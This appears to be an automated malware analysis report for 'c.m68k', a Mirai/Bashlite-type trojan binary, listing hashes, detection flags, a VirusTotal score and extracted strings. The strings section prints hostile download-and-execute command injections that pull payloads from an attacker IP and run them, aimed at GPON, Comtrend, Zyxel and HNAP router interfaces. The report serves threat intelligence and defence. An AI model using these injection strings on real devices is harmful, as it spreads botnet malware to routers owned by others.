c.m68k
First submission 2024-09-05 01:06:02
Last sumbission 2024-09-05 01:13:02
File details
File type: | ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped |
Mime type: | application/x-executable |
File size: | 135.08 KB (138320 bytes) |
MD5: | ddc1b960e6e8514934f4e1fc488d64d9 |
SHA1: | 2b0c80c57b04956c0d3916cc8cc5e1a010f9cc81 |
SHA256: | 65b126e31c5d791273b6f2f9dc78fdb0fbb93793d64ca4ab5ffafd5c14c61d49 |
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
OSINT Enrichments
Virus Total: | 38/79 VT report date: 2024-09-05 00:48:15 |
Malware Type 1 | trojan |
Threat Type 3 | mirai bashlite expl |
URLs, FQDN and IP indicators 2
Strings analysis - Possible IPs found 3
5.59.248.92 |
127.0.0.1 |
192.168.0.100 |
Strings analysis - Possible URLs found 13
http://5.59.248.92/Yboats.mips |
http://5.59.248.92/Yboats.mips; |
http://5.59.248.92/gpon443+-O+/tmp/gaf;sh+/tmp/gaf |
http://5.59.248.92/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 |
http://5.59.248.92/Yboats.mpsl;chmod |
http://5.59.248.92/adb; |
http://5.59.248.92/Yboats.arm7;chmod+777+Yboats.arm7;./Yboats.arm7+zyxel.selfrep;rm+-rf+Yboats.arm7%3b%23&remoteSubmit=Save |
http://schemas.xmlsoap.org/soap/envelope/ |
http://www.w3.org/2001/XMLSchema |
http://www.w3.org/2001/XMLSchema-instance |
http://schemas.xmlsoap.org/soap/encoding/ |
http://5.59.248.92/Yboats.x86 |
http://purenetworks.com/HNAP1/ |